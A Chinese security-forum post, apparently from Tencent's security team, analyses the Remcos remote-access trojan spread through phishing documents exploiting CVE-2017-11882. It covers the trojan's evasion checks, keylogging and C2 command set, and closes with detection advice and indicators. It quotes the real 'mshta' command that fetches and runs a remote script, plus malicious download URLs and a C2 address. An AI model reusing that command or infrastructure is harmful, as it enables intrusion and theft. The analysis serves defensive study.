查看: 2229|回复: 1
收起左侧

[技术原创] 新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

[复制链接]
腾讯电脑管家
发表于 2018-3-13 19:25:51 | 显示全部楼层 |阅读模式
本帖最后由 腾讯电脑管家 于 2018-3-13 23:39 编辑


0x1概况
         近期腾讯安全御见情报中心监测到利用CVE-2017-11882漏洞攻击的事件呈陡增趋势,在攻击洪流中,我们捕获到一款名为Remcos的远控木马通过鱼叉邮件进行传播。
      Remcos木马是一款较新的远控木马,自2016年下半年开始在黑客论坛公开售卖,其后经过多次版本更新,功能日益强大。此前针对外贸行业的“商贸信”事件中,也曾出现该木马的身影。值得注意的是,同是利用公式编辑器漏洞,Remcos远控木马较之“商贸信”病毒,呈现出“急起直追”的趋势,在近期漏洞攻击事件中表现非常活跃。

“Remcos”官网售价情况)

0x2载荷投递
         在未修复CVE-2017-11882漏洞的机器上,双击打开邮件附件中的恶意word文档,公式编辑器会利用mshta.exe执行远程脚本,命令行为“mshta https://d.pr/Wuod3I/d.pr &AAAAAAAAAAAAC”。


       远程脚本中的代码经过了简单的混淆,经过还原后,可以看到关键代码。脚本的主要作用是利用powershell下载和执行new.exe 。

(还原后的关键代码)


0x3RAT分析
      下载到的木马new.exedelphi语言编写,经过分析发现该delphi只是用来当壳的,从new.exe中可以dump真正的木马,即商业级的远控木马remcos,主要功能有远程桌面、键盘记录器、下载和运行程序、文件和注册表等的各种操作。



(木马本尊的图标)



(商业级远控程序remcos后台界面)


         Remcos启动时会解密资源中的“SETTINGS”项,从而得到服务器ip、木马功能的各种配置项、互斥体名称等。解密后的“SETTINGS”项以“@@”为分隔符,被解析后存入一个数组,以数组的索引当作key,从而方便后续利用key找到相对应的value项。


(解密后的settings项,pass为网络发包时的默认加密key



(用到的mutex名称Remcos开头)




(用到的注册表项Remcos开头)


(用到的mutex名称Remcos开头)



(检测sandbox



(检测虚拟机)




(检测vbox



(检测调试)




(可以通过配置项显示console来打印日志)



(开启键盘记录器功能)




(将记录的按键信息存储在%appdata\remcos目录下,文件名为logs.dat


(发包时都以“[DataStart]”开头,加密后发送给c2



(以“pass”来初始化加密table



(加密算法第一部分,初始化加密table的函数)



(加密算法第二部分,利用加密table去加密)



      协议body”|cmd|”进行分割,分割后的第一个字符串为命令字,比如图中的“addnew”即为命令字。



(第一个包将计算名、用户名等信息发送给c2



     服务器下发的命令字主要有:



  
主命令字
  
  
功能
  
  
ping
  
  
心跳包
  
  
keepaliveoff
  
  
console中打印了一行日志
  
  
filemgr
  
  
上传本地文件的信息或下载、执行文件
  
  
downloadfromurl
  
  
下载并打开文件
  
  
downloadfromlocal
  
  
直接执行指定的文件
  
  
getproclist
  
  
上报进程列表
  
  
Prockill
  
  
结束指定的进程
  
  
getwindows
  
  
上报窗口列表
  
  
closewindow
  
  
关闭窗口
  
  
maxwindow
  
  
最大化窗口
  
  
restorewindow
  
  
恢复窗口
  
  
closeprocfromwindow
  
  
结束带指定窗口的进程
  
  
execcom
  
  
利用WinExec执行文件
  
  
consolecmd
  
  
执行cmd命令
  
  
openaddress
  
  
ShellExecuteW  open
  
  
initializescrcap
  
  
初始化屏幕截图
  
  
freescrcap
  
  
释放屏幕截图时的相关资源
  
  
initklfrm
  
  
初始化键盘记录
  
  
startonlinekl
  
  
开启实时键盘记录
  
  
stoponlinekl
  
  
停止实时键盘记录
  
  
getofflinelogs
  
  
上传离线模式下记录的按键信息
  
  
autogetofflinelogs
  
  
自动获取离线下的按键信息
  
  
deletekeylog
  
  
删除键盘记录的文件
  
  
clearlogins
  
  
清除cookieslogin信息
  
  
getscrslist
  
  
上报文件列表信息
  
  
dwnldscr
  
  
上报存储在本地截图信息
  
  
initcamcap
  
  
初始化远程桌面时的socket等资源
  
  
freecamcap
  
  
释放远程桌面时的资源
  
  
miccapture
  
  
获取播放的声音的信息
  
  
stopmiccapture
  
  
停止监控声音设备
  
  
initpwgrab
  
  
  
  
deletefile
  
  
删除文件
  
  
close
  
  
结束某进程
  
  
uninstall
  
  
删除木马安装时的相关信息
  
  
updatefromurl
  
  
从网上下载并更新木马文件
  
  
updatefromlocal
  
  
利用已下载好的文件更新木马文件
  
  
msgbox
  
  
弹框
  
  
keyinput
  
  
模拟按键
  
  
mclick
  
  
点击鼠标
  
  
OSpower
  
  
操作电源按钮
  
  
getclipboard
  
  
获取剪贴板中的信息
  
  
setclipboard
  
  
设置剪贴板中的数据
  
  
emptyclipboard
  
  
清空剪贴板
  
  
dlldata
  
  
dll映射进内存
  
  
dllurl
  
  
将下载的dll映射进内存
  
  
initregedit
  
  
注册表相关的操作
  
  
initchat
  
  
初始化聊天相关的功能
  
  
renamebck
  
  
改注册表中的name
  
  
initsocks
  
  
初始化socket
  



0x4安全建议
         CVE-2017-11882公式编辑器漏洞补丁发布已近半年,攻击者仍亲睐使用此漏洞进行攻击,部分用户因未安装漏洞补丁导致木马入侵成功,在此提醒广大用户应及时使用腾讯电脑管家等安全软件更新系统补丁,以防御漏洞攻击,同时不要打开来历不明的邮件附件。

         该木马功能强大、键盘记录、远程桌面、文件、注册表、进程等各种远控功能都有,同时利用了先进的自加载技术来躲避杀毒软件的检测,隐蔽性较高。企业用户可按以下方法进行自查或防范:

1.      该木马会在%appdata%目录下创建名为remcos的隐藏文件夹

2.      该木马会创建名为ros的开机自启动项

3.      根据下文的c2信息检测3440端口的网络连接情况或禁用此端口



      腾讯御界高级威胁检测系统基于腾讯反病毒实验室的安全能力,依托腾讯在云和端的大数据,形成了强大且独特的威胁情报和恶意检测模型,凭借基于行为的防护和智能模型两大核心能力,能高效检测未知威胁,并实时阻拦钓鱼邮件、恶意宏文档等攻击方式。




附录(IOCs:
Md5:

6e421f7c63d9a894546d532d017c604a

48E27626AB41E8569405546360700546

7bfcf044fb11a252a71f0fd1753882ec

0a591617e781ff3722bc2fa716599eae

991F2506786A6B29D254B6D195C656D5


C2:

185.171.25.7


Urls:

https://d.pr/Wuod3I/d.pr

HTTPS://d.pr/Nn9rd2/d.pr/

https://d.pr/fHDdHh/d.pr

https://d.pr/51iOqj/d.pr

https://d.pr/chchxc/d.pr

https://d.pr/yuKlVS/d.pr

关键目录:

%appdata%\ros

%appdata%\remcos

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
aboringman
发表于 2018-3-13 20:30:27 | 显示全部楼层
插队,网址ESET拦截


VBS/TrojanDownloader.Agent.PGK 特洛伊木马 的变种

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 11:54 , Processed in 0.133769 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表